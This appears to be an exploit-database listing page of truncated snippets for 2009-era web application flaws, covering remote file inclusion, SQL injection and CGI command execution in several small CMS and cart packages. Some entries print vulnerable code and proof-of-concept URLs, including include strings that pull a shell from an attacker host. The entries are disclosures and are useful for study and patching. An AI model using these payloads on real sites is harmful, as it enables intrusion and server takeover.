Cybershade CMS 0.2 Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications ====================================================== Cybershade CMS 0.2 Remote File Inclusion Vulnerability ====================================================== Language: PHP Download:...

Cybershade CMS 0.2 Remote File Inclusion Vulnerability

No description provided by source. Author: Author: Mr.SeCreT E-mail: [email protected]:[email protected] From: Syria http://english.islamweb.net/ Script Information: Script: Cybershade CMS 0.2 Remote File Inclusion Vulnerability Language: PHP Download:...

CoreHTTP 0.5.3.1 - 'CGI' Arbitrary Command Execution

Package name: CoreHTTP server Version: 0.5.3.1 and below as long as cgi support is enabled Software URL: http://corehttp.sourceforge.net/ Exploit: http://aconole.brad-x.com/programs/corehttpcgienabled.rb Issue: CoreHTTP server fails to properly sanitize input before calling popen and allows an...

pragmaMx CMS Blind SQL/XPath Injection vulnerability

No description provided by source. CMS Name : pragmaMx All Version Bug Type : Blind SQL/XPath Injection vulnerability Found by : Hadi Kiamarsi Contact : hadikiamarsi at hotmail.com Download : http://sourceforge.net/projects/pragmamx/files/pragmaMx%20%20%28full%29/p ...

pragmaMx Blind SQL Injection

CMS Name : pragmaMx All Version Bug Type : Blind SQL/XPath Injection vulnerability Found by : Hadi Kiamarsi Contact : hadikiamarsi at hotmail.com Download : http://sourceforge.net/projects/pragmamx/files/pragmaMx%20%20%28full%29/pragmaMx%200.1.11/pragmaMx0.1.11.0.tar.gz/download PoC :...

Ptag 4.0.0 Remote File Inclusion

Exploit Title: Ptag sqltable = ptagprefix."session"; $this - cookiename = ptagprefix."session"; //If RSS mode, switch session to non-viewed tracker. if ptagoutput == "rss" parent::construct$ptagsql, sha1""; else parent::construct$ptagsql; ? PoC Ptagpath/lib/session.php?ptagdir=Shell Code sql.php...

Ptag 4.0.0 - Multiple Remote File Inclusions

Exploit Title: Ptag sqltable = ptagprefix."session"; $this - cookiename = ptagprefix."session"; //If RSS mode, switch session to non-viewed tracker. if ptagoutput == "rss" parent::construct$ptagsql, sha1""; else parent::construct$ptagsql; ? PoC Ptagpath/lib/session.php?ptagdir=Shell Code sql.php...

CFAGCMS SQL Injection Exploit

No description provided by source. Exploit Title: CFAGCMS SQL Injection Exploit Date: 20-12-2009 Author: cr4wl3r Software Link: http://sourceforge.net/project/showfiles.php?groupid=197936 Version: N/A Tested on: GNU/LINUX Code right.php $title = $GET'title'; $query = "SELECT FROM pages WHERE titl...

Ptag 4.0.0 - Multiple Remote File Inclusions

Ptag 4.0.0 - Multiple Remote File Inclusions Exploit Title: Ptag sqltable = ptagprefix."session"; $this - cookiename = ptagprefix."session"; //If RSS mode, switch session to non-viewed tracker. if ptagoutput == "rss" parent::construct$ptagsql, sha1""; else parent::construct$ptagsql; ? PoC...

CFAGCMS - SQL Injection

CFAGCMS - SQL Injection Exploit Title: CFAGCMS SQL Injection Exploit Date: 20-12-2009 Author: cr4wl3r Software Link: http://sourceforge.net/project/showfiles.php?groupid=197936 Version: N/A Tested on: GNU/LINUX Code right.php $title = $GET'title'; $query = "SELECT FROM pages WHERE title =...

Lizard Cart - Multiple SQL Injections

Lizard Cart - Multiple SQL Injections Exploit Title: Lizard Cart Multiple SQL Injection Exploit Date: 20-12-2009 Author: cr4wl3r Software Link: http://sourceforge.net/projects/lizardcart/ Version: N/A Tested on: GNU/LINUX Code detail.php $dbResult = mysqlquery"select from products where id='$id'"...

CFAGCMS - SQL Injection

Exploit Title: CFAGCMS SQL Injection Exploit Date: 20-12-2009 Author: cr4wl3r Software Link: http://sourceforge.net/project/showfiles.php?groupid=197936 Version: N/A Tested on: GNU/LINUX Code right.php $title = $GET'title'; $query = "SELECT FROM pages WHERE title = '".$title."'"; $result =...

Lizard Cart Multiple SQL Injection Exploit

No description provided by source. Exploit Title: Lizard Cart Multiple SQL Injection Exploit Date: 20-12-2009 Author: cr4wl3r Software Link: http://sourceforge.net/projects/lizardcart/ Version: N/A Tested on: GNU/LINUX Code detail.php $dbResult = mysqlquery"select from products where id='$id'"; P...

CFAGCMS SQL Injection Exploit

Exploit for unknown platform in category web applications ============================= CFAGCMS SQL Injection Exploit ============================= Exploit Title: CFAGCMS SQL Injection Exploit Date: 20-12-2009 Author: cr4wl3r Software Link:...

Lizard Cart - Multiple SQL Injections

Exploit Title: Lizard Cart Multiple SQL Injection Exploit Date: 20-12-2009 Author: cr4wl3r Software Link: http://sourceforge.net/projects/lizardcart/ Version: N/A Tested on: GNU/LINUX Code detail.php $dbResult = mysqlquery"select from products where id='$id'"; PoC lizardcartpath/detail.php?id=SQL...

gpEasy <= 1.5RC3 Remote FIle Include Exploit

Exploit for unknown platform in category web applications ============================================ gpEasy = 1.5RC3 Remote FIle Include Exploit ============================================ Exploit Title: gpEasy = 1.5RC3 Remote FIle Include Exploit Date: 18-12-2009 Author: cr4wl3r Software Link...

gpEasy &lt;= 1.5RC3 Remote FIle Include Exploit

No description provided by source. Exploit Title: gpEasy = 1.5RC3 Remote FIle Include Exploit Date: 18-12-2009 Author: cr4wl3r Software Link: http://sourceforge.net/projects/gpeasy/files/ Version: N/A Tested on: GNU/LINUX Code adminpassword.php :...

427BB Fourtwosevenbb <= 2.3.2 SQL Injection Exploit

Exploit for unknown platform in category web applications =================================================== 427BB Fourtwosevenbb PoC : http://server/path/showpost.php?ForumID=1&post=SQL...

Thatware 0.5.3 - Multiple Remote File Inclusions

Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg Thatware PoC : http://server/config.php?rootpath=http://attcker/shell.txt??? Vuln : ./thatwarepath/artlist.php line 28 PoC : http://server/artlist.php?rootpath=http://attcker/shell.txt??? Vuln : ./thatwarepath/thatfile.php line 130 PoC :...

Thatware &lt;= 0.5.3 Multiple Remote File Include Exploit

No description provided by source. Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg Thatware = 0.5.3 Multiple Remote File Include Exploit Download Script : http://sourceforge.net/projects/thatware/files Vuln : ./thatwarepath/config.php line 4 ?php include $rootpath."dbsettings.php"; ? PoC :...